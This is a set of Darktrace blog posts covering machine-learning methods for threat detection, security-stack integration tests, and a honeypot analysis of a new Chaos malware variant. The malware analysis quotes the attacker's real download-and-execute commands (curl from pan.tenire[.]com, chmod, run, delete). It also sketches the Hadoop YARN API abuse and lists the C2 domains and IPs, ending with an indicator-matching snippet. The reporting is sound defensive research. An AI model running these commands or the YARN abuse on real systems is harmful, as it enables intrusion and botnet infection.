February 10, 2025

From Hype to Reality: How AI is Transforming Cybersecurity Practices

AI hype is everywhere, but not many vendors are getting specific. Darktrace’s multi-layered AI combines various machine learning techniques for behavioral analytics, real-time threat detection, investigation, and autonomous response.

AI is everywhere, predominantly because it has changed the way humans interact with data. AI is a powerful tool for data analytics, predictions, and recommendations, but accuracy, safety, and security are paramount for operationalization.

In cybersecurity, AI-powered solutions are becoming increasingly necessary to keep up with modern business complexity and this new age of cyber-threat, marked by attacker innovation, use of AI, speed, and scale. The emergence of these new threats calls for a varied and layered approach in AI security technology to anticipate asymmetric threats.

While many cybersecurity vendors are adding AI to their products, they are not always communicating clearly what those capabilities are or what data they use. This is especially the case with Large Language Models (LLMs). Many products are adding interactive and generative capabilities that do not necessarily increase detection and response efficacy, but instead enhance the analyst and security team experience and data retrieval.

Consequently, many people erroneously conflate generative AI with other types of AI. Similarly, only 31% of security professionals report that they are “very familiar” with supervised machine learning, the type of AI most often applied in today’s cybersecurity solutions to identify threats using attack artifacts and facilitate automated responses. This confusion around AI and its capabilities can result in suboptimal cybersecurity measures, overfitting, inaccuracies due to ineffective methods or data, inefficient use of resources, and heightened exposure to advanced cyber threats.

Vendors must cut through the AI market noise and demystify the technology in their products to enable safe, secure, and accurate adoption. To that end, let’s discuss common AI techniques in cybersecurity as well as how Darktrace applies them.

Modernizing cybersecurity with AI

Machine learning has presented a significant opportunity to the cybersecurity industry, and many vendors have been using it for years. Despite its high potential benefit, not every AI tool or machine learning model is equally effective; efficacy depends on the technique, its application, and the data it was trained on.

Supervised machine learning and cybersecurity

Supervised machine learning models are trained on labeled, structured data to automate tasks that humans have previously performed and labeled. Some cybersecurity vendors have been experimenting with supervised machine learning for years, most of them automating threat detection based on reported attack data using big data science, shared cyber-threat intelligence, known or reported attack behavior, and classifiers.
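As a concrete illustration of the pattern (a minimal scikit-learn sketch with hypothetical features and toy data, not any vendor’s implementation), a supervised detector learns from labeled attack artifacts and can only recognize what resembles that labeled history:

```python
# Illustrative only: a minimal supervised threat classifier. Feature names and
# data are hypothetical; real systems train on large labeled attack corpora.
from sklearn.ensemble import RandomForestClassifier

# Each row: [bytes_out, failed_logins, new_admin_created, off_hours]
X_train = [
    [1_200,  0, 0, 0],   # labeled benign
    [900,    1, 0, 1],   # labeled benign
    [50_000, 8, 1, 1],   # labeled malicious (reported attack)
    [75_000, 5, 1, 0],   # labeled malicious (reported attack)
]
y_train = [0, 0, 1, 1]   # labels come from known/reported attacks

clf = RandomForestClassifier(n_estimators=100, random_state=0)
clf.fit(X_train, y_train)

# The model can only recognize what resembles its labeled history:
print(clf.predict_proba([[60_000, 6, 1, 1]]))  # resembles a known attack
```

Anything that falls outside the labeled distribution, such as a genuinely novel technique, is effectively invisible to this kind of model.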

In the last several years, however, more vendors have expanded into behavioral analytics and anomaly detection. In many applications, this method separates the learning phase, when the behavioral profile is created (baselining), from the subsequent anomaly detection. As such, it does not learn continuously and requires periodic updating and re-training to stay current with dynamic business operations and new attack techniques. Unfortunately, this opens the door to a high rate of daily false positives and false negatives.

Unsupervised machine learning and cybersecurity

Unlike supervised approaches, unsupervised machine learning does not require labeled training data or human-led training. Instead, it independently analyzes data to detect compelling patterns without relying on knowledge of past threats, removing the dependency on human input to guide learning.

However, it is constrained by its input parameters, requiring thoughtful technique and feature selection to ensure accurate outputs. Additionally, while these anomaly-focused methods can discover novel patterns in data, some of those patterns may be irrelevant and distracting.

When such models are used for behavioral analytics and anomaly detection, the outputs come in the form of anomalies rather than classified threats, requiring additional modeling for threat behavior context and prioritization. Anomaly detection performed in isolation can produce resource-wasting false positives.
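A minimal sketch of that output shape, using scikit-learn’s IsolationForest on hypothetical traffic features: the model emits anomaly flags and scores, not threat classifications, so the risk context described above must be layered on separately.

```python
# Illustrative only: unsupervised anomaly detection with IsolationForest.
# No labels are used; the output is "anomalous or not," with no threat
# classification attached.
import numpy as np
from sklearn.ensemble import IsolationForest

rng = np.random.default_rng(0)
# Hypothetical per-device features: [connections/hour, unique ports, MB uploaded]
normal_traffic = rng.normal(loc=[50, 5, 10], scale=[10, 2, 3], size=(500, 3))

model = IsolationForest(contamination=0.01, random_state=0)
model.fit(normal_traffic)

# A device suddenly opening many ports and uploading heavily:
suspect = np.array([[55, 40, 900]])
print(model.predict(suspect))        # -1 = anomaly, 1 = normal
print(model.score_samples(suspect))  # raw anomaly score, not a threat label
```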

LLMs and cybersecurity

LLMs are a major aspect of mainstream generative AI, and they can be used in both supervised and unsupervised ways. They are pre-trained on massive volumes of data and can be applied to human language, machine language, and more.

With the recent explosion of LLMs in the market, many vendors are rushing to add generative AI to their products, using it for chatbots, Retrieval-Augmented Generation (RAG) systems, agents, and embeddings. Generative AI in cybersecurity can optimize data retrieval for defenders, summarize reporting, or emulate sophisticated phishing attacks for preventative security.

But because LLMs perform semantic analysis, they can struggle with the consistent reasoning necessary for security analysis and detection. If not applied responsibly, generative AI can cause confusion by “hallucinating” (referencing invented data) when post-processing does not catch it, or by providing conflicting responses driven by confirmation bias in prompts written by different security team members.
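One common way to ground LLM output is retrieval: at its core, a RAG lookup is nearest-neighbor search over embeddings, with the retrieved text injected into the prompt. A toy sketch follows, with hypothetical 3-dimensional vectors standing in for a real embedding model and vector store:

```python
# Illustrative only: the core of a RAG-style lookup is nearest-neighbor
# search over embeddings. Vectors here are toy 3-D stand-ins.
import numpy as np

docs = {
    "alert_runbook":  np.array([0.9, 0.1, 0.0]),
    "vpn_policy":     np.array([0.1, 0.8, 0.1]),
    "phishing_guide": np.array([0.0, 0.2, 0.9]),
}

def retrieve(query_vec: np.ndarray, k: int = 1) -> list[str]:
    """Return the k documents with highest cosine similarity to the query."""
    def cos(a, b):
        return float(a @ b / (np.linalg.norm(a) * np.linalg.norm(b)))
    ranked = sorted(docs, key=lambda name: cos(query_vec, docs[name]), reverse=True)
    return ranked[:k]

# A query like "How do I triage this alert?" embedded (hypothetically)
# near alert_runbook:
print(retrieve(np.array([0.8, 0.2, 0.1])))  # ['alert_runbook']
# The retrieved text is then injected into the LLM prompt, grounding the answer.
```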

Combining techniques in a multi-layered AI approach

Each type of machine learning technique has its own set of strengths and weaknesses, so a multi-layered, multi-method approach is ideal to enhance functionality while overcoming the shortcomings of any one method.

Darktrace’s Self-Learning AI is a multi-layered engine powered by multiple machine learning approaches that operate in combination for cyber defense. This allows Darktrace to protect the entire digital estates of the organizations it secures, including corporate networks, cloud computing services, SaaS applications, IoT, Industrial Control Systems (ICS), and email systems.

Plugged into the organization’s infrastructure and services, our AI engine ingests and analyzes raw data and its interactions within the environment, forming an understanding of normal behavior right down to the granular details of specific users and devices. The system continually revises its understanding of what is normal based on evolving evidence, learning continuously rather than relying on periodic baselining.

This dynamic understanding of normal, partnered with dozens of anomaly detection models, means the AI engine can identify, with a high degree of precision, events or behaviors that are both anomalous and unlikely to be benign. Viewing anomalies through the lens of many models, and autonomously fine-tuning each model’s performance, gives us greater confidence in anomaly detection.
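For intuition only (a toy sketch, not Darktrace’s architecture), viewing an event through several weighted detectors means a single noisy model cannot trigger an alert by itself:

```python
# Toy fusion layer over several anomaly detectors. Weights here are hand-set;
# the autonomous fine-tuning described above is not implemented in this sketch.
from dataclasses import dataclass

@dataclass
class DetectorOutput:
    name: str
    anomaly_score: float  # 0.0 (normal) .. 1.0 (highly anomalous)
    weight: float         # trust in this detector for this context

def fused_score(outputs: list[DetectorOutput]) -> float:
    """Weighted combination: one noisy detector alone cannot trigger."""
    total_w = sum(o.weight for o in outputs)
    return sum(o.anomaly_score * o.weight for o in outputs) / total_w

event = [
    DetectorOutput("rare_external_endpoint", 0.92, weight=1.0),
    DetectorOutput("unusual_data_volume",    0.88, weight=1.2),
    DetectorOutput("new_admin_credential",   0.15, weight=0.8),
]
print(f"fused anomaly score: {fused_score(event):.2f}")  # alert only if several agree
```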

The next layer provides event correlation and threat behavior context to understand the risk level of anomalous events. Every anomalous event is investigated by Cyber AI Analyst, which combines unsupervised machine learning models that analyze logs with supervised machine learning trained on how analysts investigate. This provides anomaly and risk context, along with explainable investigation outcomes.

The ability to identify activity that represents the first footprints of an attacker, without any prior knowledge or intelligence, lies at the heart of the AI system’s efficacy in keeping pace with threat actor innovations and changes in tactics and techniques. It helps the human team detect subtle indicators that can be hard to spot amid the immense noise of legitimate, day-to-day digital interactions. This enables advanced threat detection with full domain visibility.

Digging deeper into AI: Mapping specific machine learning techniques to cybersecurity functions

Visibility and control are vital for the practical adoption of AI solutions, as they build trust between human security teams and their AI tools. That is why we want to share some specific applications of AI across our solutions, moving beyond hype and buzzwords to provide grounded, technical explanations.

Darktrace’s technology helps security teams cover every stage of the incident lifecycle with a range of comprehensive analysis and autonomous investigation and response capabilities.

  1. Behavioral prediction: Our AI understands your unique organization by learning normal patterns of life. It accomplishes this with multiple clustering algorithms, anomaly detection models, a Bayesian meta-classifier for autonomous fine-tuning, graph theory, and more.
  2. Real-time threat detection: With a true understanding of normal, our AI engine connects anomalous events to risky behavior using probabilistic models. 
  3. Investigation: Darktrace performs in-depth analysis and investigation of anomalies, in particular automating Level 1 of a SOC team and augmenting the rest of the SOC team through prioritization for human-led investigations. Some of these methods include supervised and unsupervised machine learning models, semantic analysis models, and graph theory.
  4. Response: Darktrace calculates the proportional action to take to neutralize in-progress attacks at machine speed. As a result, organizations are protected 24/7, even when the human team is out of the office. By understanding the normal pattern of life of an asset or peer group, the autonomous response engine can isolate the anomalous or risky behavior and surgically block it. The engine can also enforce the peer group’s pattern of life when rare and risky behavior continues (a toy sketch of this idea follows the list).
  5. Customizable model editor: This layer of customizable logic models tailors our AI’s processing to give security teams more visibility as well as the opportunity to adapt outputs, therefore increasing explainability, interpretability, control, and the ability to modify the operationalization of the AI output with auditing.
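To make the pattern-of-life enforcement in item 4 concrete, here is a toy sketch; the group names, behaviors, and policy logic are invented for illustration and are not Darktrace’s implementation:

```python
# Toy sketch of pattern-of-life enforcement: allow only actions within a peer
# group's learned normal behavior and surgically block deviations. All names
# and behaviors here are hypothetical.
PEER_GROUP_NORMAL = {
    "finance_workstations": {"smb_to_fileserver", "https_to_saas_erp", "dns_lookup"},
}

def proportional_response(device_group: str, observed_action: str) -> str:
    """Block only the deviating action; leave learned-normal behavior untouched."""
    normal = PEER_GROUP_NORMAL.get(device_group, set())
    if observed_action in normal:
        return "allow"
    return f"block '{observed_action}', continue allowing learned-normal actions"

print(proportional_response("finance_workstations", "smb_to_fileserver"))
# allow
print(proportional_response("finance_workstations", "ssh_to_rare_external_host"))
# block 'ssh_to_rare_external_host', continue allowing learned-normal actions
```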

See the complete AI architecture in the paper “The AI Arsenal: Understanding the Tools Shaping Cybersecurity.”

Figure 1: Alerts can be customized in the model editor in many ways, such as editing the thresholds for rarity and unusualness scores.

Machine learning is the fundamental ally in cyber defense

Traditional security methods, even those that use a narrow subset of machine learning, are no longer sufficient: they can neither keep up with every possible attack vector nor respond fast enough to machine-speed attacks whose complexity exceeds known and expected patterns.

Security teams require advanced detection capabilities, using multiple machine learning techniques to understand the environment, filter the noise, and take action where threats are identified.

Darktrace’s Self-Learning AI comes together to achieve behavioral prediction, real-time threat detection and response, and incident investigation, all while empowering your security team with visibility and control.

Learn how AI is Applied in Cybersecurity

Discover specifically how Darktrace applies different types of AI to improve cybersecurity efficacy and operations in this technical paper.



April 8, 2026

How to Secure AI and Find the Gaps in Your Security Operations


What “securing AI” actually means (and doesn’t)

Security teams are under growing pressure to “secure AI” at the same pace at which businesses are adopting it. But in many organizations, adoption is outpacing the ability to govern, monitor, and control it. When that gap widens, decision-making shifts from deliberate design to immediate coverage. The priority becomes getting something in place, whether that’s a point solution, a governance layer, or an extension of an existing platform, rather than ensuring those choices work together.

At the same time, AI governance is lagging adoption. 37% of organizations still lack AI adoption policies, shadow AI usage across SaaS has surged, and there are notable spikes in anomalous data uploads to generative AI services.  

First and foremost, it’s important to recognize the dual nature of AI risk. Much of the industry has focused on how attackers will use AI to move faster, scale campaigns, and evade detection. But what’s becoming just as significant is the risk introduced by AI inside the organization itself. Enterprises are rapidly embedding AI into workflows, SaaS platforms, and decision-making processes, creating new pathways for data exposure, privilege misuse, and unintended access across an already interconnected environment.

Because the introduction of complex AI systems into modern, hybrid environments is reshaping attacker behavior and exposing gaps between security functions, the challenge is no longer just having the right capabilities in place but effectively coordinating prevention, detection, investigation, response, and remediation together. As threats accelerate and systems become more interconnected, security depends on coordinated execution, not isolated tools, which is why lifecycle-based approaches to governance, visibility, behavioral oversight, and real-time control are gaining traction.

From cloud consolidation to AI systems: what we can learn

We have seen a version of AI adoption before in cloud security. In the early days, tooling fragmented into posture, workload/runtime, identity, data, and more. Gradually, cloud security collapsed into broader cloud platforms. The lesson was clear: posture without runtime misses active threats; runtime without posture ignores root causes. Strong programs ran both in parallel and stitched the findings together in operations.  

Today’s AI wave stretches that lesson across every domain. Adversaries are compressing “time‑to‑tooling” using LLM‑assisted development (“vibecoding”) and recycling public PoCs at unprecedented speed. That makes it difficult to secure through siloed controls, because the risk is not confined to one layer. It emerges through interactions across layers.

Keep in mind, most modern attacks don’t succeed by defeating a single control. They succeed by moving through the gaps between systems faster than teams can connect what they are seeing. Recent exploitation waves like React2Shell show how quickly opportunistic actors operationalize fresh disclosures and chain misconfigurations to monetize at scale.

In the React2Shell window, defenders observed rapid, opportunistic exploitation and iterative payload diversity across a broad infrastructure footprint; strains like these outpace signature-first thinking.

You can stay up to date on attacker behavior by monitoring our Inside the SOC blog page where Darktrace’s threat research team and analyst community regularly dive deep into threat finds.

Ultimately, speed met scale in the cloud era; AI adds interconnectedness and orchestration. Simple questions — What happened? Who did it? Why? How? Where else? — now cut across identities, SaaS agents, model/service endpoints, data egress, and automated actions. The longer it takes to answer, the worse the blast radius becomes.

The case for a platform approach in the age of AI

Think of security fusion as the connective tissue that lets you prevent, detect, investigate, and remediate in parallel, not in sequence. In practice, that looks like:

  1. Unified telemetry with behavioral context across identities, SaaS, cloud, network, endpoints, and email, so an anomalous action in one plane automatically informs expectations in others. (Inside‑the‑SOC investigations show this pays off when attacks hop fast between domains.)
  2. Pre‑CVE and “in‑the‑wild” awareness feeding controls before signatures, reducing dwell time in fast exploitation windows.
  3. Automated, bounded response that can contain likely‑malicious actions at machine speed without breaking workflows, buying analysts time to investigate with full context; a toy sketch of this follows the list. (Rapid CVE coverage and exploit‑wave posts illustrate how critical those first minutes are.)
  4. Investigation workflows that assume AI is in the loop, for both defenders and attackers. As adversaries adopt “agentic” patterns, investigations need graph‑aware, sequence‑aware reasoning to prioritize what matters early.
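As a rough illustration of item 3’s bounded autonomy (a toy sketch; the thresholds and action names are invented, not any vendor’s logic):

```python
# Toy sketch of bounded autonomy: containment scales with confidence and
# never exceeds a pre-approved blast radius. Thresholds and actions invented.
def bounded_response(confidence: float, asset_criticality: str) -> str:
    if confidence < 0.5:
        return "log_and_watch"               # observe, no intervention
    if confidence < 0.8:
        return "rate_limit_connection"       # slow the attacker, keep workflows alive
    if asset_criticality == "business_critical":
        return "block_anomalous_flows_only"  # surgical, workflow-preserving
    return "isolate_device"                  # full containment, pre-approved scope

print(bounded_response(0.9, "standard"))           # isolate_device
print(bounded_response(0.9, "business_critical"))  # block_anomalous_flows_only
```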

This isn’t theoretical. It’s reflected in the Darktrace posts that consistently draw readership: timely threat intel with proprietary visibility and executive frameworks that transform field findings into operating guidance.  

The five questions that matter (and the one that matters more)

When alerted to malicious or risky AI use, you’ll ask:

  1. What happened?
  2. Who did it?
  3. Why did they do it?
  4. How did they do it?
  5. Where else can this happen?

The sixth, more important question is: How much worse does it get while you answer the first five? The answer depends on whether your controls operate in sequence (slow) or in fused parallel (fast).

What to watch next: How the AI security market will likely evolve

Markets follow patterns. Expect an initial bloom of AI posture & governance tools, followed quickly by observability, then detection & response, and ultimately investigation & remediation capabilities that consolidate under broader platforms. The pace of that consolidation won’t be set by marketing; it will be set by attacker innovation. Analytical posts that tracked earlier waves (BeyondTrust exploitation, WSUS abuse) and AI‑era attacks (React2Shell) suggest defenders will need faster fusion across functions as adversaries use AI to widen and accelerate their playbooks.

Bottom line: In the age of AI, seams are the new surface. The winners will be teams that collapse the distance between seeing and doing and between domains that used to operate apart.

Building the Groundwork for Secure AI: How to Test Your Stack’s True Maturity

AI doesn’t create new surfaces as much as it exposes the fragility of the seams that already exist.  

Darktrace’s own public investigations consistently show that modern attacks, from LinkedIn‑originated phishing that pivots into corporate SaaS to multi‑stage exploitation waves like BeyondTrust CVE‑2026‑1731 and React2Shell, succeed not because a single control failed, but because no control saw the whole sequence, or no system was able to respond at the speed of escalation.  

Before thinking about “AI security,” customers should ensure they’ve built a security foundation where visibility, signals, and responses can pass cleanly between domains. That requires pressure‑testing the seams.

Below are the key integration questions and stack‑maturity tests every organization should run.

1. Do your controls see the same event the same way?

Integration questions

  • When an identity behaves strangely (impossible travel, atypical OAuth grants), does that signal automatically inform your email, SaaS, cloud, and endpoint tools?
  • Do your tools normalize events in a way that lets you correlate identity → app → data → network without human stitching?

Why it matters

Darktrace’s public SOC investigations repeatedly show attackers starting in an unmonitored domain, then pivoting into monitored ones, such as phishing on LinkedIn that bypassed email controls but later appeared as anomalous SaaS behavior.

If tools can’t share or interpret each other's context, AI‑era attacks will outrun every control.

Tests you can run

  1. Shadow Identity Test
  • Create a temporary identity with no history.
  • Perform a small but unusual action: unusual browser, untrusted IP, odd OAuth request.
  • Expected maturity signal: other tools (email/SaaS/network) should immediately score the identity as high‑risk.
  2. Context Propagation Test
  • Trigger an alert in one system (e.g., endpoint anomaly) and check if other systems automatically adjust thresholds or sensitivity.
  • Low maturity signal: nothing changes unless an analyst manually intervenes.
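As a thought experiment, the Context Propagation Test is checking for something like the following; every class, API, and threshold here is hypothetical, sketched only to show the shape of cross-domain signal sharing:

```python
# Hypothetical sketch of context propagation: a risk signal raised in one
# domain automatically tightens sensitivity in the others. All names invented.
from collections import defaultdict

class FusionBus:
    def __init__(self):
        self.risk = defaultdict(float)  # identity -> cumulative risk score
        self.subscribers = []           # domain tools listening for updates

    def subscribe(self, tool):
        self.subscribers.append(tool)

    def raise_risk(self, identity: str, delta: float, source: str):
        self.risk[identity] += delta
        for tool in self.subscribers:
            tool.on_risk_update(identity, self.risk[identity], source)

class DomainTool:
    def __init__(self, name: str):
        self.name = name
        self.threshold = 0.8            # default alert threshold

    def on_risk_update(self, identity, score, source):
        if source != self.name and score > 0.5:
            self.threshold = 0.4        # tighten for risky identities
            print(f"{self.name}: lowered alert threshold for {identity}")

bus = FusionBus()
for name in ("email", "saas", "network"):
    bus.subscribe(DomainTool(name))

# Identity tool observes an atypical OAuth grant from an untrusted IP:
bus.raise_risk("svc-account-17", delta=0.6, source="identity")
```

Low maturity looks like the opposite: the identity signal stays in the identity tool until an analyst copies it across consoles by hand.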

2. Does detection trigger coordinated action, or does everything act alone?

Integration questions

  • When one system blocks or contains something, do other systems automatically tighten, isolate, or rate‑limit?
  • Does your stack support bounded autonomy — automated micro‑containment without broad business disruption?

Why it matters

In public cases like BeyondTrust CVE‑2026‑1731 exploitation, Darktrace observed rapid C2 beaconing, unusual downloads, and tunneling attempts across multiple systems. Containment windows were measured in minutes, not hours.  

Tests you can run

  1. Chain Reaction Test
  • Simulate a primitive threat (e.g., access from TOR exit node).
  • Your identity provider should challenge → email should tighten → SaaS tokens should re‑authenticate.
  • Weak seam indicator: only one tool reacts.
  2. Autonomous Boundary Test
  • Induce a low‑grade anomaly (credential spray simulation).
  • Evaluate whether automated containment rules activate without breaking legitimate workflows.

3. Can your team investigate a cross‑domain incident without swivel‑chairing?

Integration questions

  • Can analysts pivot from identity → SaaS → cloud → endpoint in one narrative, not five consoles?
  • Does your investigation tooling use graphs or sequence-based reasoning, or is it list‑based?

Why it matters

Darktrace’s Cyber AI Analyst and DIGEST research highlight why investigations must interpret structure and progression, not just standalone alerts. Attackers now move between systems faster than human triage cycles.

Tests you can run

  1. One‑Hour Timeline Build Test
  • Pick any detection.
  • Give an analyst one hour to produce a full sequence: entry → privilege → movement → egress.
  • Weak seam indicator: they spend >50% of the hour stitching exports.
  2. Multi‑Hop Replay Test
  • Simulate an incident that crosses domains (phish → SaaS token → data access).
  • Evaluate whether the investigative platform auto‑reconstructs the chain.
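For intuition, graph-based reconstruction of a multi-hop incident might look like this minimal sketch, using the networkx library; the events and entity names are invented:

```python
# Hypothetical sketch: reconstructing a cross-domain attack chain as a graph
# instead of hand-stitching exports from five consoles.
import networkx as nx

events = [  # (source_entity, target_entity, action)
    ("phish_email",   "user_jane",     "credential_entry"),
    ("user_jane",     "saas_token_42", "oauth_grant"),
    ("saas_token_42", "crm_app",       "api_login"),
    ("crm_app",       "export_job_9",  "bulk_data_access"),
]

g = nx.DiGraph()
for src, dst, action in events:
    g.add_edge(src, dst, action=action)

# Auto-reconstruct the entry -> egress chain:
chain = nx.shortest_path(g, "phish_email", "export_job_9")
print(" -> ".join(chain))
# phish_email -> user_jane -> saas_token_42 -> crm_app -> export_job_9
```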

4. Do you detect intent or only outcomes?

Integration questions

  • Can your stack detect the setup behaviors before an attack becomes irreversible?
  • Are you catching pre‑CVE anomalies or post‑compromise symptoms?

Why it matters

Darktrace publicly documents multiple examples of pre‑CVE detection, where anomalous behavior was flagged days before vulnerability disclosure. AI‑assisted attackers will hide behind benign‑looking flows until the very last moment.

Tests you can run

  1. Intent‑Before‑Impact Test
  • Simulate reconnaissance-like behavior (DNS anomalies, odd browsing to unknown SaaS, atypical file listing).
  • Mature systems will flag intent even without an exploit.
  2. CVE‑Window Test
  • During a real CVE patch cycle, measure detection lag vs. public PoC release.
  • Weak seam indicator: your detection rises only after mass exploitation begins.

5. Are response and remediation two separate universes?

Integration questions

  • When you contain something, does that trigger root-cause remediation workflows in identity, cloud config, or SaaS posture?
  • Does fixing a misconfiguration automatically update correlated controls?

Why it matters

Darktrace’s cloud investigations (e.g., cloud compromise analysis) emphasize that remediation must close both runtime and posture gaps in parallel.

Tests you can run

  1. Closed‑Loop Remediation Test
  • Introduce a small misconfiguration (over‑permissioned identity).
  • Trigger an anomaly.
  • Mature stacks will: detect → contain → recommend or automate posture repair.
  2. Drift‑Regression Test
  • After remediation, intentionally re‑introduce drift.
  • The system should immediately recognize deviation from known‑good baseline.

6. Do SaaS, cloud, email, and identity all agree on “normal”?

Integration questions

  • Is “normal behavior” defined in one place or many?
  • Do baselines update globally or per-tool?

Why it matters

Attackers (including AI‑assisted ones) increasingly exploit misaligned baselines, appearing “normal” to one system and anomalous to another.

Tests you can run

  1. Baseline Drift Test
  • Change the behavior of a service account for 24 hours.
  • Mature platforms will flag the deviation early and propagate updated expectations.
  2. Cross‑Domain Baseline Consistency Test
  • Compare identity’s risk score vs. cloud vs. SaaS.
  • Weak seam indicator: risk scores don’t align.
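As a simplified illustration of a single shared baseline that updates continuously, consider this toy exponentially weighted moving average (EWMA) sketch; the values, smoothing factor, and tolerance are invented:

```python
# Toy shared behavioral baseline: one EWMA consulted by every domain,
# rather than one baseline per tool.
def make_baseline(alpha: float = 0.1, tolerance: float = 3.0):
    state = {"mean": None, "var": 1.0}

    def observe(value: float) -> bool:
        """Update the baseline; return True if the value counts as drift."""
        if state["mean"] is None:
            state["mean"] = value
            return False
        deviation = abs(value - state["mean"]) / (state["var"] ** 0.5)
        drifted = deviation > tolerance
        # Continuous learning: the baseline keeps updating either way.
        state["mean"] = (1 - alpha) * state["mean"] + alpha * value
        state["var"] = (1 - alpha) * state["var"] + alpha * (value - state["mean"]) ** 2
        return drifted

    return observe

observe = make_baseline()
for hourly_api_calls in [20, 22, 19, 21, 20, 23, 95]:  # service account activity
    if observe(hourly_api_calls):
        print(f"drift flagged at {hourly_api_calls} calls/hour")
```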

Final takeaway

Security teams shouldn’t ask:
“How do I secure AI?”

They should ask:
“Can my stack operate as one system before AI amplifies pressure on every seam?”

Only once an organization can reliably detect, correlate, and respond across domains can it safely begin to secure AI models, agents, and workflows.

About the author
Nabil Zoldjalali
VP, Field CISO


April 7, 2026

Darktrace Identifies New Chaos Malware Variant Exploiting Misconfigurations in the Cloud


Introduction

To observe adversary behavior in real time, Darktrace operates a global honeypot network known as “CloudyPots”, designed to capture malicious activity across a wide range of services, protocols, and cloud platforms. These honeypots provide valuable insights into the techniques, tools, and malware actively targeting internet‑facing infrastructure.

One of the services targeted within Darktrace’s honeypots is Hadoop, an open-source framework developed by Apache that enables the distributed processing of large data sets across clusters of computers. In Darktrace’s honeypot environment, the Hadoop instance is intentionally misconfigured to allow attackers to achieve remote code execution on the service. In one case from March 2026, this enabled Darktrace to identify and further investigate activity linked to Chaos malware.

What is Chaos Malware?

First discovered by Lumen’s Black Lotus Labs, Chaos is Go-based malware [1]. It is speculated to be of Chinese origin, based on Chinese-language characters found within strings in the sample and the presence of zh-CN locale indicators. Based on code overlap, Chaos is likely an evolution of the Kaiji botnet.

Chaos has historically targeted routers, spreading primarily through SSH brute-forcing and known Common Vulnerabilities and Exposures (CVEs) in router software. It then utilizes infected devices as part of a Distributed Denial-of-Service (DDoS) botnet, as well as for cryptomining.

Darktrace’s view of a Chaos Malware Compromise

The attack began when a threat actor sent a request to an endpoint on the Hadoop deployment to create a new application.

Figure 1: The initial infection being delivered to the unsecured endpoint.

This defines a new application with an initial command to run inside the container, specified in the command field of the am-container-spec section. This, in turn, initiates several shell commands:

  • curl -L -O http://pan.tenire[.]com/down.php/7c49006c2e417f20c732409ead2d6cc0 - downloads a file from the attacker’s server, in this case a Chaos agent malware executable.
  • chmod 777 7c49006c2e417f20c732409ead2d6cc0 - sets permissions so that all users can read, write, and execute the malware.
  • ./7c49006c2e417f20c732409ead2d6cc0 - executes the malware.
  • rm -rf 7c49006c2e417f20c732409ead2d6cc0 - deletes the malware file from disk to reduce traces of activity.
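For readers unfamiliar with the underlying mechanism, the submission flow roughly follows YARN’s documented ResourceManager REST API: request an application ID, then submit an application whose am-container-spec command is executed inside a container. A simplified reconstruction follows (the host is hypothetical, and the real request observed may have differed in its details):

```python
# Simplified reconstruction of the abuse pattern against an unsecured Hadoop
# YARN ResourceManager REST API, for understanding the technique, not reuse.
import requests

RM = "http://victim-hadoop:8088"  # hypothetical exposed ResourceManager

# Step 1: ask YARN for a new application ID. On a misconfigured cluster,
# no authentication is required.
app_id = requests.post(f"{RM}/ws/v1/cluster/apps/new-application").json()["application-id"]

# Step 2: submit the application; the "command" inside am-container-spec is
# an arbitrary shell command that YARN will run in a container.
requests.post(f"{RM}/ws/v1/cluster/apps", json={
    "application-id": app_id,
    "application-name": "innocuous-job",
    "application-type": "YARN",
    "am-container-spec": {
        "commands": {"command": "curl -L -O http://.../payload && ..."},  # placeholder
    },
})
```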

In practice, once this application is created, an attacker-defined binary is downloaded from their server, executed on the system, and then removed to prevent forensic recovery. The domain pan.tenire[.]com has previously been observed in another campaign, dubbed “Operation Silk Lure”, which delivered the ValleyRAT Remote Access Trojan (RAT) via malicious job application resumes. Like Chaos, this campaign featured extensive Chinese characters throughout its stages, including within the fake resumes themselves. The domain resolves to 107[.]189.10.219, a virtual private server (VPS) hosted in BuyVM’s Luxembourg location, a provider known for offering low-cost VPS services.

Analysis of the updated Chaos malware sample

Chaos has historically targeted routers and other edge devices, making compromises of Linux server environments a relatively new development. The sample observed by Darktrace in this compromise is a 64-bit ELF binary, whereas most router hardware runs on ARM, MIPS, or PowerPC architectures, often 32-bit.

The malware sample used in the attack has undergone notable restructuring compared to earlier versions. The default namespace has been changed from “main_chaos” to just “main”, and several functions have been reworked. Despite these changes, the sample retains its core features, including persistence mechanisms established via systemd and a malicious keep-alive script stored at /boot/system.pub.

Figure 2: The creation of the systemd persistence service.

Likewise, the functions to perform DDoS attacks are still present, with methods that target the following protocols:

  • HTTP
  • TLS
  • TCP
  • UDP
  • WebSocket

However, several features such as the SSH spreader and vulnerability exploitation functions appear to have been removed. In addition, several functions that were previously believed to be inherited from Kaiji have also been changed, suggesting that the threat actors have either rewritten the malware or refactored it extensively.

A new function of the malware is a SOCKS proxy. When the malware receives a StartProxy command from the command-and-control (C2) server, it begins listening on an attacker-specified TCP port and operates as a SOCKS5 proxy, enabling the attacker to route traffic through the compromised server. This capability offers several advantages: it makes attack activity appear to originate from the victim rather than the attacker, and it allows the attacker to pivot into internal networks reachable only from the compromised server.

Figure 3: The command processor for StartProxy. Due to endianness, the string is reversed.

In previous cases, other DDoS botnets, such as Aisuru, have been observed pivoting to offer proxying services to other cybercriminals. The creators of Chaos may have taken note of this trend and added similar functionality to expand their monetization options and enhance the capabilities of their own botnet, helping ensure they do not fall behind competing operators.

The sample contains an embedded domain, gmserver.osfc[.]org[.]cn, which it uses to resolve the IP of its C2 server. At the time of writing, the domain resolves to 70[.]39.181.70, an IP owned by NetLabel Global and geolocated in Hong Kong.

Historically, the domain has also resolved to 154[.]26.209.250, owned by Kurun Cloud, a low-cost VPS provider that offers dedicated server rentals. The malware uses port 65111 for sending and receiving commands, although neither IP appears to be actively accepting connections on this port at the time of writing.
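For defenders, a minimal sweep of flow telemetry for the indicators reported in this post might look like the following sketch; the log schema is hypothetical, and the indicators are un-defanged versions of those in the IoC list below:

```python
# Hypothetical sketch: sweeping flow records for the indicators in this post.
# Field names are invented; adapt to your own telemetry schema.
IOC_IPS   = {"182.90.229.95", "107.189.10.219", "70.39.181.70", "154.26.209.250"}
IOC_HOSTS = {"pan.tenire.com", "gmserver.osfc.org.cn"}
C2_PORT   = 65111  # Chaos command channel reported above

def check_flow(flow: dict) -> list[str]:
    """Return a list of indicator matches for one flow record."""
    hits = []
    if flow.get("dst_ip") in IOC_IPS:
        hits.append(f"known bad IP {flow['dst_ip']}")
    if flow.get("dst_host") in IOC_HOSTS:
        hits.append(f"known bad domain {flow['dst_host']}")
    if flow.get("dst_port") == C2_PORT:
        hits.append(f"traffic to Chaos C2 port {C2_PORT}")
    return hits

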